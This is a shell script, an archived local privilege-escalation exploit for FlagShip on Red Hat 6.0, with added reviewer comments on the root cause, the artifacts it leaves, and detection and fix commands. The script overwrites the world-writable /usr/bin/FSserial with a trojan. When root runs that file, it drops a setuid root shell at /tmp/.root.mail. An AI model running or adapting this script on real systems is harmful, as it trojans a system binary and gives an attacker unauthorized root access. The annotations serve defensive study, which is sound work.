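#!/bin/sh
#
# Program Description:
#   FlagShip (from Red Hat Application CD) is a Database Development System
#   for xBase based applications on nearly all Unix brands.
#
# Problem:
#   /usr/bin/FSserial is world-writeable! We can replace it with a
#   trojan and trick root to execute it.
#
# System Vulnerable: Red Hat 6.0
#
# fi.sh (lame) (half)exploit by Narrow
# Archived at: www.hack.co.za [27 September 2000]
#
# Reviewer notes (defensive reading):
#   Root cause: an executable in a system directory is installed with the
#   world-write bit set (incorrect permission assignment, CWE-732). Any
#   local user can replace its contents; nothing happens until a privileged
#   user runs the replaced file, which is why the author calls this a
#   "half" exploit.
#   Artifacts left on disk by this script: /tmp/fs.bak (copy of the
#   original file) and, once root has run the replaced file, a setuid copy
#   of /bin/sh at /tmp/.root.mail (mode 4755).
#   Checks and fixes for an affected host:
#     find /usr/bin -type f -perm -0002       # world-writable executables
#     find /tmp -type f -perm -4000           # setuid files in /tmp
#     chmod o-w /usr/bin/FSserial             # remove the world-write bit
#     rpm -V <flagship-package>               # placeholder name; compare
#                                             # file modes/digests with the
#                                             # package database
#   Mounting /tmp with the nosuid option makes a setuid file placed there
#   ineffective.
#
# Layout note: the archived page had the whole script collapsed onto one
# line, so everything after the shebang was a comment, and the final echo
# was fused with the site footer and left unterminated. Line breaks are
# restored here and the last string is closed so that the file parses.

# Precondition 1: the target file has to exist.
if [ ! -f /usr/bin/FSserial ]; then
  echo "Error: File /usr/bin/FSserial doesn't exist!"
  exit 1
fi

# Precondition 2: the target has to be writable. Note that -w tests
# writability for the invoking user, not the world-write bit specifically,
# so the message below is only accurate for an unprivileged non-owner.
if [ ! -w /usr/bin/FSserial ]; then
  echo "Error: /usr/bin/FSserial not world writeable!"
  exit 1
fi

# Keep a copy of the original file. /tmp/fs.bak is a fixed path and is a
# useful indicator when triaging a host.
echo -n "Backup of FSserial (/tmp/fs.bak) ... "
cp /usr/bin/FSserial /tmp/fs.bak
echo "OK"; echo

# Overwrite the world-writable file with a short shell script. The first
# redirection truncates the file, the following ones append to it.
echo -n "Trojaning FSserial ... "
echo "#!/bin/sh" >/usr/bin/FSserial ; echo >>/usr/bin/FSserial
# Decoy message shown to whoever runs the replaced file.
echo "echo File Damaged" >>/usr/bin/FSserial
# Payload lines: copy /bin/sh and set mode 4755 on the copy. The copy is
# owned by whoever runs the replaced file, so the setuid bit only grants
# root when root runs it.
echo "cp /bin/sh /tmp/.root.mail" >>/usr/bin/FSserial
echo "chmod 4755 /tmp/.root.mail" >>/usr/bin/FSserial
echo "OK"; echo

echo "FSserial is now trojaned. Now it's your turn to trick"
# NOTE(review): the remainder of this message was cut off in the archived
# page; only the word "root" survives, so the string is closed after it.
echo "root"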